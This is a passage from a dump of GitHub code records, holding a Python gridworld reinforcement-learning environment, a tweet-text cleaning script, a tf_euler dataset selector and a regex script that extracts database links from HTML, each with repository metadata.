(self.direction==self.directions.down and 'D' in cell) or (self.direction==self.directions.left and 'L' in cell)\n            if not wall:\n                dirs = [0,-1],[1,0],[0,1],[-1,0]\n                x = x + dirs[self.direction][1]\n                y = y + dirs[self.direction][0]\n        elif action == self.actions.right:\n            self.direction = (self.direction+1)%len(self.directions)\n        elif action == self.actions.left:\n            self.direction = 
(self.direction+len(self.directions)-1)%len(self.directions)\n\n if self.position in self.Doors and (x,y) in self.Doors and self.position!=(x,y) and self.Doors[self.position] in self.closed_doors:\n self.closed_doors.remove(self.Doors[self.position])\n \n self.position = (x, y)\n \n object_states = []\n for i in self.gridworld_objects_keys:\n object_states.append(self.gridworld_objects[i].state(self.position))\n \n if self._get_grid_value(self.position) == 1: # new position in walls list\n # stay at old state if new coord is wall\n self.position = self.state[0]\n else:\n self.state = self.position, self.direction, frozenset(self.doors-self.closed_doors), tuple(object_states)\n \n return self.state, reward, self.done, None\n\n def _get_reward(self, state, action): \n return self.step_reward \n\n def reset(self):\n self.done = False\n self.closed_doors = self.doors.copy()\n \n if not self.start_position:\n idx = np.random.randint(len(self.possiblePositions))\n self.position = self.possiblePositions[idx] # self.start_state_coord\n else:\n self.position = self.start_position[np.random.randint(len(self.start_position))]\n \n self.direction = self.start_direction if self.start_direction != None else np.random.choice(self.directions)\n \n for p,f in self.gridworld_objects.items():\n f.reset()\n \n object_states = []\n for i in self.gridworld_objects_keys:\n object_states.append(self.gridworld_objects[i].state(self.position))\n self.state = (self.position,self.direction, frozenset(self.doors-self.closed_doors), tuple(object_states))\n return self.state\n\n def render(self, agent=True, env_map=False, goal=None, fig=None, mode='human', title=None, grid=False): \n img = self._gridmap_to_img(goal=goal) \n if not fig:\n fig = plt.figure(1, figsize=(12, 8), dpi=60, facecolor='w', edgecolor='k')\n \n params = {'font.size': 20}\n plt.rcParams.update(params)\n plt.clf()\n plt.xticks([])\n plt.yticks([])\n plt.grid(grid)\n if title:\n plt.title(title, fontsize=20)\n\n plt.imshow(img, origin=\"upper\", extent=[0, self.n, self.m, 0])\n fig.canvas.draw()\n\n if env_map:\n ax = fig.gca() \n for position in self.possiblePositions:\n y,x = position\n # Grid walls\n if (y,x) in self.Doors and self.Doors[(y,x)] in self.closed_doors:\n if (y,x+1) in self.Doors:\n self._draw_cell(ax, x, y, \"R\", color=\"#c2c2c2\")\n if (y,x-1) in self.Doors:\n self._draw_cell(ax, x, y, \"L\", color=\"#c2c2c2\")\n if (y+1,x) in self.Doors:\n self._draw_cell(ax, x, y, \"D\", color=\"#c2c2c2\")\n if (y-1,x) in self.Doors:\n self._draw_cell(ax, x, y, \"T\", color=\"#c2c2c2\")\n continue\n cell = self.grid[y][x]\n if cell == 0 or cell == 1:\n continue\n self._draw_cell(ax, x, y, cell)\n \n # Grid objects\n for gridworld_object, function in self.gridworld_objects.items():\n if position in function.positions and function.count[position]>0:\n p = gridworld_object[0].upper()\n c = function.count[position]\n c = '' if c == float('inf') else str(c)\n label = \"{}{}\".format(c,p)\n \n ax.text(x+0.25, y+0.65, label, style='oblique', size=fig.get_figheight()*2)\n break\n\n if agent:\n for (x,y) in self.GoalLocations.keys():\n self._draw_action(ax, x, y, self.actions.done, color=\"#c2c2c2\")\n y, x = self.position\n self._draw_agent(ax, x, y, self.direction)\n \n if mode == 'rgb_array':\n width, height = fig.get_size_inches() * fig.get_dpi()\n img = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n img = img.reshape(int(width), int(height), 3)\n return img\n \n return fig\n\n def _map_init(self):\n self.grid = []\n lines = 
self.MAP.split('\\n')\n\n        for i, row in enumerate(lines):\n            row = row.split(' ')\n            if self.n is not None and len(row) != self.n:\n                raise ValueError(\n                    \"Map's rows are not of the same dimension...\")\n            self.n = len(row)\n            rowArray = []\n            for j, col in enumerate(row):\n                if col in \"01\":\n                    rowArray.append(int(col))\n                else:\n                    rowArray.append(col)\n                if col == \"1\":\n                    self.walls.append((i, j))\n                # possible positions\n                else:\n                    self.possiblePositions.append((i, j))\n            self.grid.append(rowArray)\n        self.m = i + 1\n\n        self._find_hallWays()\n\n    def _find_hallWays(self):\n        self.hallwayStates = []\n        for x, y in self.possiblePositions:\n            if ((self.grid[x - 1][y] == 1) and (self.grid[x + 1][y] == 1)) or \\\n                    ((self.grid[x][y - 1] == 1) and (self.grid[x][y + 1] == 1)):\n                self.hallwayStates.append((x, y))\n\n    def _get_grid_value(self, position):\n        return self.grid[position[0]][position[1]]\n\n    # specific for self.MAP\n    def _getRoomNumber(self, state=None):\n        if state == None:\n            state = self.state\n        # if state isn't at hall way point\n        xCount = self._greaterThanCounter(state, 0)\n        yCount = self._greaterThanCounter(state, 1)\n        room = 0\n        if yCount >= 2:\n            if xCount >= 2:\n                room = 2\n            else:\n                room = 1\n        else:\n            if xCount >= 2:\n                room = 3\n            else:\n                room = 0\n\n        return room\n\n    def _greaterThanCounter(self, state, index):\n        count = 0\n        for h in self.hallwayStates:\n            if state[index] > h[index]:\n                count = count + 1\n        return count\n\n    def _draw_agent(self, ax, x, y, dir, color='black'):\n        triangle = np.zeros((3,2))\n        \n        if dir == self.directions.up:\n            triangle[0] = [x+0.5,y+0.2]\n            triangle[1] = [x+0.25,y+0.8]\n            triangle[2] = [x+0.75,y+0.8]\n        if dir == self.directions.down:\n            triangle[0] = [x+0.5,y+0.8]\n            triangle[1] = [x+0.25,y+0.2]\n            triangle[2] = [x+0.75,y+0.2]\n        if dir == self.directions.right:\n            triangle[0] = [x+0.8,y+0.5]\n            triangle[1] = [x+0.2,y+0.25]\n            triangle[2] = [x+0.2,y+0.75]\n        if dir == self.directions.left:\n            triangle[0] = [x+0.2,y+0.5]\n            triangle[1] = [x+0.8,y+0.25]\n            triangle[2] = [x+0.8,y+0.75]\n\n        ax.add_patch(plt.Polygon(triangle, color=color))\n        \n    def _draw_cell(self, ax, x, y, cell, color='black'):\n        pos = x, y\n        for wall in cell:\n            x, y = pos\n            if wall == \"T\":\n                dx = 1\n                dy = 0\n            if wall == \"R\":\n                x += 1\n                dx = 0\n                dy = 1\n            if wall == \"D\":\n                y += 1\n                dx = 1\n                dy = 0\n            if wall == \"L\":\n                dx = 0\n                dy = 1\n\n            ax.add_patch(ax.arrow(x,  # x1\n                                  y,  # y1\n                                  dx,  # x2 - x1\n                                  dy,  # y2 - y1\n                                  facecolor=color,\n                                  edgecolor=color,\n                                  width=0.1,\n                                  head_width=0.0,\n                                  )\n                         )\n\n    def _draw_action(self, ax, x, y, action, color='black'):\n        if action == self.actions.up:\n            x += 0.5\n            y += 1\n            dx = 0\n            dy = -0.4\n        if hasattr(self.actions, 'down') and action == self.actions.down:\n            x += 0.5\n            dx = 0\n            dy = 0.4\n        if action == self.actions.right:\n            y += 0.5\n            dx = 0.4\n            dy = 0\n        if action == self.actions.left:\n            x += 1\n            y += 0.5\n            dx = -0.4\n            dy = 0\n        if action == self.actions.done:\n            x += 0.5\n            y += 0.5\n            dx = 0\n            dy = 0\n\n            ax.add_patch(plt.Circle((x, y), radius=0.25, fc=color, transform=ax.transData))\n            return\n\n        ax.add_patch(ax.arrow(x,  # x1\n                              y,  # y1\n                              dx,  # x2 - x1\n                              dy,  # y2 - y1\n                              facecolor=color,\n                              edgecolor=color,\n                              width=0.005,\n                              head_width=0.4,\n                              )\n                     )\n\n    def _draw_reward(self, ax, x, y, action, reward, cmap):\n        x += 0.5\n        y += 0.5\n        triangle = np.zeros((3,2))\n        triangle[0] = [x,y]\n        \n        if action == self.actions.up:\n            triangle[1] = [x-0.5,y-0.5]\n            triangle[2] = [x+0.5,y-0.5]\n        if hasattr(self.actions, 'down') and action == self.actions.down:\n            triangle[1] = [x-0.5,y+0.5]\n            triangle[2] = 
[x+0.5,y+0.5]\n if action == self.actions.right:\n triangle[1] = [x+0.5,y-0.5]\n triangle[2] = [x+0.5,y+0.5]\n if action == self.actions.left:\n triangle[1] = [x-0.5,y-0.5]\n triangle[2] = [x-0.5,y+0.5]\n if action == self.actions.done: \n ax.add_patch(plt.Circle((x, y), radius=0.25, color=cmap(reward)))\n return\n\n ax.add_patch(plt.Polygon(triangle, color=cmap(reward)))\n\n\n def _gridmap_to_img(self, goal=None):\n row_size = len(self.grid)\n col_size = len(self.grid[0])\n\n obs_shape = [row_size, col_size, 3]\n\n img = np.zeros(obs_shape)\n\n gs0 = int(img.shape[0] / row_size)\n gs1 = int(img.shape[1] / col_size)\n for i in range(row_size):\n for j in range(col_size):\n for k in range(3):\n if False and (i, j) == self.position:#start_position:\n this_value = COLOURS[10][k]\n else:\n cell = self.grid[i][j]\n if cell == 0 or cell == 1:\n colour_number = int(cell)\n else:\n colour_number = 0\n this_value = COLOURS[colour_number][k]\n img[i * gs0:(i + 1) * gs0, j * gs1:(j + 1)\n * gs1, k] = this_value\n return img\n\n\n### Defining tasks over the environment\n\npredicates = {\n '1room': lambda state: state[3][0][0],\n '2room': lambda state: state[3][1][0],\n '3room': lambda state: state[3][2][0],\n '4room': lambda state: state[3][3][0],\n 'sdoor': lambda state: \"s\" in state[2],\n 'ndoor': lambda state: \"n\" in state[2],\n 'edoor': lambda state: \"e\" in state[2],\n 'wdoor': lambda state: \"w\" in state[2],\n}\n\nclass Task(gym.core.Wrapper):\n def __init__(self, env, predicates=predicates, task_goals=[], rmax=10, rmin=-0.1, start_position=None, start_direction=None):\n super().__init__(env)\n \n self.env.start_position = start_position\n self.start_direction = start_direction\n self.task_goals = task_goals\n self.rmax = rmax\n self.rmin = rmin\n \n # self.env.actions['DONE'] = len(self.env.actions) \n # self.env.action_space = spaces.Discrete(env.action_space.n+1)\n\n self.predicates = predicates\n self.predicate_keys =tuple(sorted(list(self.predicates.keys())))\n self.goals = [self.goal_predicates(i) for i in range(2**len(self.predicate_keys))]\n self.goal_space = spaces.Discrete(len(self.goals))\n\n self.state = None\n \n def reset(self):\n self.state = self.env.reset() \n return self.state\n \n def step(self, action):\n if action == self.actions.done:\n state = self.get_goal(self.state)\n reward = self._get_reward(state)\n done = True\n info = {}\n else:\n state, reward, done, info = self.env.step(action)\n self.state = state\n \n return state, reward, done, info\n \n def get_goal(self, state): # Labelling function\n goal = ''\n for predicate in self.predicate_keys:\n goal += str(0+self.predicates[predicate](state))\n\n return int(goal, 2)\n \n def predicates_goal(self, predicates):\n goal = ''\n for predicate in self.predicate_keys:\n goal += '1' if predicate in predicates else '0'\n\n return int(goal, 2)\n \n def goal_predicates(self, goal):\n goal = bin(goal)[2:]\n goal = '0'*(len(self.predicate_keys)-len(goal)) + goal\n predicates = set()\n for i in range(len(self.predicate_keys)-1,-1,-1):\n if goal[i] == '1':\n predicates.add(self.predicate_keys[i])\n\n return predicates\n \n def _get_reward(self, goal):\n return self.rmax if (goal in self.task_goals) else self.rmin \n\n def render(self, **kwargs):\n return self.env.render(**kwargs) 
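\n\n\n# Hedged usage sketch -- the goal choice and action below are illustrative\n# assumptions, not taken from the source:\n# env = Task(GridWorld())\n# env.task_goals = [env.predicates_goal({'1room'})]\n# state = env.reset()\n# state, reward, done, info = env.step(env.actions.up)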
\n","repo_name":"tamlinlove/kuricomposition","sub_path":"kuri_composition/kuri_composition_TL/env/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":21579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29101680074","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 22 23:35:12 2020\r\n\r\n@author: namratabakre\r\n\"\"\"\r\nimport tweepy\r\nimport json\r\nfrom datetime import datetime, timedelta\r\nimport re\r\nimport demoji\r\n#import datetime,time\r\nfrom dateutil.parser import parse\r\n#from datetime import datetime, timedelta\r\n#import pandas as pd\r\nimport glob\r\n\r\nretweets = []\r\ntweets_list = []\r\npoi = []\r\n\r\n\r\n\r\ndef hour_rounder(t):\r\n # Rounds to nearest hour by adding a timedelta hour if minute >= 30\r\n return (t.replace(second=0, microsecond=0, minute=0, hour=t.hour)\r\n + timedelta(hours=t.minute // 30))\r\n\r\n\r\ndate = hour_rounder(datetime.now()) # i/p\r\noutput_date = date.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n\r\n# rx = re.compile(pattern = \"(\\u00a9|\\u00ae|[\\u2000-\\u3300]|\\ud83c[\\ud000-\\udfff]|\\ud83d[\\ud000-\\udfff]|\\ud83e[\\ud000-\\udfff])\", flags = re.UNICODE) \r\n# regrex_pattern = re.compile(pattern = \"[\"\r\n# u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n# u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n# u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n# u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n# \"]+\", flags = re.UNICODE)\r\n\r\nrx = re.compile(\"[\"\r\n u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n u\"\\U00002500-\\U00002BEF\" # chinese char\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U000024C2-\\U0001F251\"\r\n u\"\\U0001f926-\\U0001f937\"\r\n u\"\\U00010000-\\U0010ffff\"\r\n u\"\\u2640-\\u2642\"\r\n u\"\\u2600-\\u2B55\"\r\n u\"\\u200d\"\r\n u\"\\u23cf\"\r\n u\"\\u23e9\"\r\n u\"\\u231a\"\r\n u\"\\ufe0f\" # dingbats\r\n u\"\\u3030\"\r\n \"]+\", re.UNICODE)\r\n \r\ndef remove_emoji(text):\r\n # tmp = regrex_pattern.findall(text)\r\n # tmp.extend()\r\n # return regrex_pattern.sub(r'', text), tmp\r\n return rx.sub(r'', text), rx.findall(text)\r\n \r\nemojfilter = re.compile(\r\n pattern=\"(\\:\\w+\\:|\\<[\\/\\\\]?3|[\\(\\)\\\\\\D|\\*\\$][\\-\\^]?[\\:\\;\\=]|[\\:\\;\\=B8][\\-\\^]?[3DOPp\\@\\$\\*\\\\\\)\\(\\/\\|])(?=\\s|[\\!\\.\\?]|$)\")\r\nurlfilter = re.compile(pattern=\"(?Phttps?://[^\\s]+)\")\r\n\r\ndef remove_entities(obj, text):\r\n cleaned = text\r\n _id = str(obj['id'])\r\n urls = obj['entities']['urls']\r\n hashtags = obj['entities']['hashtags']\r\n mentions = obj['entities']['user_mentions']\r\n hashtags_res = []\r\n mentions_res = []\r\n urls_res = []\r\n\r\n if urls:\r\n for url in urls:\r\n cleaned = cleaned.replace(url['url'], '')\r\n urls_res.append(url['url'])\r\n else:\r\n urltmp = urlfilter.findall(cleaned)\r\n if urltmp:\r\n urls_res.extend(urltmp)\r\n cleaned = urlfilter.sub(r'', cleaned)\r\n\r\n if hashtags:\r\n for h in hashtags:\r\n ix = h['indices']\r\n cleaned = cleaned.replace(text[ix[0]:ix[1]], '')\r\n hashtags_res.append(h['text'])\r\n\r\n if mentions:\r\n for m in mentions:\r\n ix = m['indices']\r\n cleaned = cleaned.replace(text[ix[0]:ix[1]], '')\r\n mentions_res.append(m['screen_name'])\r\n\r\n cleaned, emoticons = remove_emoji(cleaned)\r\n\r\n tmp, emojis = 
emojfilter.sub(r'', cleaned), emojfilter.findall(cleaned)\r\n '''if not tmp:\r\n logger(f'ID {_id} text {text} cleaned {cleaned}, tmp {tmp}, emojis {\"\".join(emojis)}')'''\r\n emoticons = emoticons + emojis\r\n cleaned = tmp\r\n\r\n # Use solr stop word removeer\r\n\r\n return cleaned, emoticons, urls_res, mentions_res, hashtags_res\r\n\r\nke = ['profile_background_color', 'profile_link_color', 'profile_sidebar_border_color', 'profile_sidebar_fill_color',\r\n 'profile_text_color']\r\n\r\n\r\ndef clean_color(j):\r\n for k in ke:\r\n j['user'][k] = '#' + str(j['user'][k])\r\n if(j.get('retweeted_status') != None):\r\n temp = j.get('retweeted_status')\r\n j['retweeted_status']['user'][k] = '#' + str(j['retweeted_status']['user'][k])\r\n if(temp.get('quoted_status')!= None):\r\n j['retweeted_status']['quoted_status']['user'][k] = '#' + str(j['retweeted_status']['quoted_status']['user'][k])\r\n \r\n #print(j['retweeted_status']['user'][k])\r\n #break\r\n if(j.get('quoted_status') != None):\r\n j['quoted_status']['user'][k] = '#' + str(j['quoted_status']['user'][k])\r\n \r\n '''if(j.get('retweeted_status') != None):\r\n temp = j.get('retweeted_status')\r\n if(temp.get('quoted_status') != None):\r\n temp1 = temp.get('quoted_status')\r\n if(temp1.get(k) != None):\r\n j['user']['retweeted_status']['quoted_status'][k] = '#' + str(j['user']['retweeted_status']['quoted_status'][k])'''\r\n return j\r\n\r\ndef json_creator1(ip_files,outputfilename,country):\r\n #text_xx, tweet_emoticons, tweet_urls, tweet_mentions, tweet_hashtags = remove_entities(j, j['tweet_text'])\r\n with open(outputfilename, \"w\") as write_file:\r\n for ip_json in ip_files:\r\n \r\n #ip_json = json.loads(ip_json)\r\n \r\n #print(ip_json)\r\n #break\r\n xx = 'en' if ip_json['lang'] not in ['en', 'hi', 'it'] else ip_json['lang']\r\n text_xx, tweet_emoticons, tweet_urls, tweet_mentions, tweet_hashtags = remove_entities(ip_json, ip_json['text'])\r\n \r\n ip_json['poi_name'] = None\r\n ip_json['poi_id'] = None\r\n ip_json['country'] = country\r\n ip_json['tweet_text'] = ip_json['text']\r\n ip_json['tweet_lang'] = ip_json['lang']\r\n ip_json[f'text_{xx}'] = text_xx,\r\n ip_json['hashtags'] = tweet_hashtags,\r\n ip_json['mentions'] = tweet_mentions\r\n ip_json['tweet_urls'] = tweet_urls\r\n ip_json['tweet_emoticons'] = tweet_emoticons\r\n ip_json['tweet_date'] = datetime.strftime(datetime.strptime(ip_json['created_at'],'%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')\r\n ip_json = clean_color(ip_json)\r\n #print(ip_json)\r\n \r\n '''data = {\r\n \t\"poi_name\":None,\r\n \t\"poi_id\":None,\r\n \t\"country\": country,\r\n \t\"tweet_text\":ip_json['text'],\r\n \t\"tweet_lang\":ip_json['lang'],\r\n f'text_{xx}':text_xx,\r\n \t#\"text_xx\":text_xx,\r\n \t\"hashtags\":tweet_hashtags,\r\n \t\"mentions\":tweet_mentions,\r\n \t\"tweet_urls\":tweet_urls,\r\n \t\"tweet_emoticons\":tweet_emoticons,\r\n \"tweet_date\": datetime.strftime(datetime.strptime(ip_json['created_at'],'%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')\r\n }'''\r\n json.dump(ip_json, write_file)\r\n #print(ip_json)\r\n write_file.close()\r\n \r\n\r\ndef read_data(filenames):\r\n json_data=[]\r\n for i in filenames:\r\n print(i)\r\n file = open(i,'rb')\r\n print('success')\r\n for line in file:\r\n json_line=json.loads(line)\r\n #print('Type of json line',type(json_line))\r\n #break\r\n json_data.append(json_line)\r\n \r\n \r\n print('success1')\r\n return json_data\r\n \r\n \r\n \r\n\r\n\r\ndef getRetweets():\r\n \r\n 
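# NOTE: the glob paths below are machine-specific. This routine loads the\r\n    # IndiaData*.json dumps, drops duplicate tweets, and writes IndiaReady.json.\r\n    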
#json_creator1('C:\\Users\\ashis\\Desktop\\mytest.json','USAReady.json','USA')\r\n #f=open ('/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/FinalTest/In.json', 'r')\r\n filenames_India = glob.glob(\"/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/IndiaData/IndiaData*.json\")\r\n print(len(filenames_India))\r\n India_Data = read_data(filenames_India)\r\n print(len(India_Data))\r\n #json_object = json.dumps(India_Data)\r\n #print(type(json_object))\r\n \r\n \r\n \r\n #Consolidate data into one file\r\n #with open(\"/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/IndiaData/IndiaFinal.json\", \"w\",encoding=\"utf-8\") as outfile: \r\n #outfile.write(json_object) \r\n \r\n #f=open('IndiaFinal.json', \"r\")\r\n input_ = []\r\n #tweets = f.readlines()\r\n for i in India_Data:\r\n if i not in input_: # for removing duplicate tweets\r\n input_.append(i)\r\n print(len(input_))\r\n print(type(input_[0]))\r\n \r\n json_creator1(input_,'IndiaReady.json','India')\r\n #print (len(response))\r\n \r\n '''#print(i)\r\n #break\r\n a_1 = remove_hashtags(i)\r\n print(a_1)\r\n break\r\n a_2 = remove_emoji(a_1)\r\n a_3 = remove_url(a_2)\r\n #print(a_3)\r\n #break\r\n #a_4 = get_emoji_list(a_3)\r\n #print(type(a_4))\r\n a_4 = remove_user_mentions1(a_3)\r\n print(a_4)\r\n break\r\n tweets_json = json.loads(i)\r\n #cleaned, emoticons, urls_res, mentions_res, hashtags_res = remove_entities(tweets_json,tweets_json['text'])\r\n print(cleaned)\r\n break\r\n \r\n #print(tweets_json.keys())\r\n txt = tweets_json['text']\r\n if(txt.startswith('RT')):\r\n retweets.append(tweets_json)\r\n else:\r\n tweets_list.append(tweets_json)\r\n \r\n\r\ndemoji.download_codes()\r\ngetRetweets()\r\nprint(len(retweets))\r\nprint(len(tweets_list))'''\r\ngetRetweets()","repo_name":"NamrataBakre/Information-Retrieval","sub_path":"Project1/PA1.py","file_name":"PA1.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"27816182804","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tf_euler.python.dataset.ppi import ppi\nfrom tf_euler.python.dataset.reddit import reddit\nfrom tf_euler.python.dataset.test_data import test_data\nfrom tf_euler.python.dataset.cora import cora\nfrom tf_euler.python.dataset.pubmed import pubmed\nfrom tf_euler.python.dataset.citeseer import citeseer\nfrom tf_euler.python.dataset.fb15k import FB15K\nfrom tf_euler.python.dataset.fb15k237 import FB15K237\nfrom tf_euler.python.dataset.wn18 import WN18\nfrom tf_euler.python.dataset.mutag import MUTAG\nfrom tf_euler.python.dataset.ml_1m import MovieLens_1M\n\n\ndef get_dataset(data_name):\n data_name = data_name.lower()\n if data_name == 'ppi':\n print('dataset is ppi')\n return ppi()\n elif data_name == 'reddit':\n print('dataset is reddit')\n return reddit()\n elif data_name == 'test_data':\n print('dataset is test_data')\n return test_data()\n elif data_name == 'cora':\n print('dataset is cora')\n return cora()\n elif data_name == 'pubmed':\n print('dataset is pubmed')\n return pubmed()\n elif data_name == 'citeseer':\n print('dataset is citeseer')\n return citeseer()\n elif data_name == 'fb15k':\n print('dataset is fb15k')\n return FB15K()\n elif data_name == 'fb15k-237':\n print('dataset is fb15k-237')\n return FB15K237()\n elif data_name == 'wn18':\n print('dataset is wn18')\n return WN18()\n elif data_name == 'mutag':\n print('dataset is mutag')\n 
return MUTAG()\n elif data_name == 'movielens-1m':\n print('dataset is movielens-1m')\n return MovieLens_1M()\n else:\n raise RuntimeError('Failed to get dataset. \\\n Dataset name must be one of \\\n [ppi/reddit/cora/pubmed/citeseer/test_data/fb15k/MUTAG]')\n","repo_name":"alibaba/euler","sub_path":"tf_euler/python/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":2865,"dataset":"github-code","pt":"47"} +{"seq_id":"33705884072","text":"# Command line arguments\nimport argparse\n\n# Nice printing for dictionaries\nimport json\n\n# Regular expressions\nimport re\n\n\n\n\n# Initialize parser.\nparser = argparse.ArgumentParser(\n description = 'Search for regular expressions in a file.',\n add_help = False\n)\n\n# Adding arguments\n# Source: https://stackoverflow.com/questions/39047075/reorder-python-argparse-argument-groups/39047348\n\nrequiredNamed = parser.add_argument_group('required named arguments')\n\nrequiredNamed.add_argument(\n '-m', \n '--method', \n help = 'Which regex search option to use. The options are \\'all_matches\\', \\'first_match\\'.', \n required = True\n)\n\nrequiredNamed.add_argument(\n '-r', \n '--regex', \n help = 'The regex to use when searching --text.', \n required = True\n)\n\nrequiredNamed.add_argument(\n '-t', \n '--text', \n help = 'What text to search. Should be a file.', \n required = True\n)\n\n\n\n\noptional = parser.add_argument_group('optional arguments')\n\noptional.add_argument(\n '-h', \n '--help', \n action = 'help', \n help = 'Show this help message and exit.'\n)\n\noptional.add_argument(\n '-c', \n '--comparison-file', \n help = 'Which file to compare results to.'\n)\n\noptional.add_argument(\n '-n', \n '--negatives-file', \n help = 'Which file contains the true negatives.'\n)\n\noptional.add_argument(\n '-o', \n '--objects', \n action = 'store_true',\n help = 'Pass match objects from search. 
Default is FALSE.',\n)\n\noptional.add_argument(\n '-p', \n '--print-matches', \n action = 'store_true',\n help = 'Print the match list.',\n)\n\n# optional.add_argument(\n# '-w', \n# '--write-matches', \n# action = 'store_true',\n# help = 'Write the matches to file.',\n# )\n\n# Read arguments from command line.\nargs = parser.parse_args()\n\n\n\n\n# The class to make the requests\nclass Regex:\n\n\n \"\"\"Regex functions\"\"\"\n \n\n # Searcher, file-independent\n def searcher(\n self,\n return_match_objects,\n search_method,\n search_regex,\n search_text,\n ):\n\n \"\"\"Actual searching\"\"\"\n \n # Kick back the matches, but first, fix\n # the regex to search for.\n\n # Complex...\n # Source: https://stackoverflow.com/a/55810892\n regex_update = rf\"{search_regex}\"\n\n # Tell the user what the search string is.\n print('\\nSearch string: ' + regex_update + '\\n')\n \n # Do a search based on the method provided.\n if search_method == 'all_matches':\n \n # Kick back only the matches, or the match objects?\n if return_match_objects is True:\n\n # Use the iterable.\n # Source: https://stackoverflow.com/questions/4697882/how-can-i-find-all-matches-to-a-regular-expression-in-python/4697884#4697884\n return re.finditer(\n pattern = regex_update,\n string = search_text\n )\n\n else:\n\n return re.findall(\n pattern = regex_update, \n string = search_text\n )\n\n elif search_method == 'first_match':\n\n # Kick back only the matches, or the match objects?\n if return_match_objects is True:\n\n # Kick back the match object.\n return re.search(\n pattern = regex_update,\n string = search_text\n )\n\n else:\n\n # Only kick back the group as a LIST\n # to keep return types consistent\n # with the 'all_matches' option.\n return [\n re.search(\n pattern = regex_update,\n string = search_text\n ).group()\n ]\n \n\n # regex search\n def regex_search(\n self,\n return_match_objects,\n search_method,\n search_regex,\n search_text,\n ):\n\n \"\"\"Try to load a file\"\"\"\n\n # Try to get the file and search it.\n try:\n\n # errors=\"ignore\" required on windows\n # Source: https://stackoverflow.com/a/50709581\n with open(search_text, 'r', errors = 'ignore') as f:\n \n # Completely remove newlines, making one massive\n # string.\n massive = ''.join([i.strip() for i in f.readlines()])\n\n # Ask for the matches.\n return self.searcher(\n return_match_objects = return_match_objects,\n search_method = search_method,\n search_regex = search_regex,\n search_text = massive\n )\n \n except FileNotFoundError:\n\n print('File not found! Quitting...')\n\n\n\n\n# --- MAIN --- #\n\n\n\n\n# Instantiate the class.\nrgx = Regex()\n\n# See if we can find the regex.\ntest = rgx.regex_search(\n return_match_objects = args.objects,\n search_method = args.method,\n search_regex = args.regex,\n search_text = args.text\n)\n\n# print(test)\nprint(len(test))\n\nprint('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n\n# Create a dictionary to hold the database name\n# and IDs.\ndb_links = {}\n\n# Process a list of possible hits.\nfor t in test:\n \n print('---------------------------')\n \n # The HTML structure reveals that the database IDs\n # occur within a structure. 
In particular,\n # database IDs are LINKED, so look for the database name\n # and the database link only.\n print(t)\n # We can split on the i match.\n structured_search = rgx.searcher(\n return_match_objects = True,\n search_method = 'all_matches',\n search_regex = '(.*?)i(.*?)<\\/tr>',\n search_text = t\n )\n\n for m in structured_search:\n print('***************************')\n print(m.group())\n\n # Get the position of the match, then partition\n # the string based on this position.\n match_position = m.group().index('i')\n print('match_position: ' + str(match_position))\n \n print('@@@@@@@@@@@@@@')\n dbname = m.group()[0:match_position]\n links = m.group()[match_position+12:]\n print(dbname)\n print('%%%%%%%%%%%%%%%%%%%%%')\n print(links)\n print('###################')\n \n # Now find the last '>' FROM THE END.\n # Source: https://www.tutorialspoint.com/python/string_rfind.htm\n last_char_search = dbname.rfind('>')\n\n if last_char_search != -1:\n \n # Just keep the last part of the string\n # past the match.\n print('DATABASE NAME')\n print(dbname[last_char_search+1:])\n\n # Add to the results.\n if dbname[last_char_search+1:] not in db_links:\n db_links[dbname[last_char_search+1:]] = []\n \n # Find the links after the sup tags.\n links_search = rgx.searcher(\n return_match_objects = True,\n search_method = 'all_matches',\n search_regex = '(.*?)(.*?)<\\/a>',\n search_text = links\n )\n\n # Go over each potential link match.\n for lm in links_search:\n\n # Split on the .\n a_split = lm.group().split('')\n\n for a in a_split:\n\n # Now just keep characters from the\n # right side, like above.\n last_char_search_links = a.rfind('>')\n\n if last_char_search_links != -1:\n\n # Append.\n print('Attempt to append...')\n print(db_links[dbname[last_char_search+1:]])\n print(a[last_char_search+1:])\n db_links[dbname[last_char_search+1:]].append(a[last_char_search_links+1:])\n print('~~~~~~~~')\n print(a[last_char_search_links+1:])\n\n print('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n\n# Quick and dirty method to get the unique values\n# from db_links.\ndb_links_keys = db_links.keys()\n\npretty = {}\n\nfor k in db_links_keys:\n pretty[k] = list(set(db_links[k]))\n\n# Print it nice and pretty.\nprint(\n json.dumps(\n pretty,\n indent = 4,\n sort_keys = True\n )\n)","repo_name":"chrisarmstrong151/workshop_extension","sub_path":"workshop_1/design_challenge/design_challenge_chris_solution.py","file_name":"design_challenge_chris_solution.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39022211852","text":"import google_auth_oauthlib.flow\n\nfrom django.db import DEFAULT_DB_ALIAS, connections\nfrom django.core import exceptions\n\nfrom sheets_db.backend import 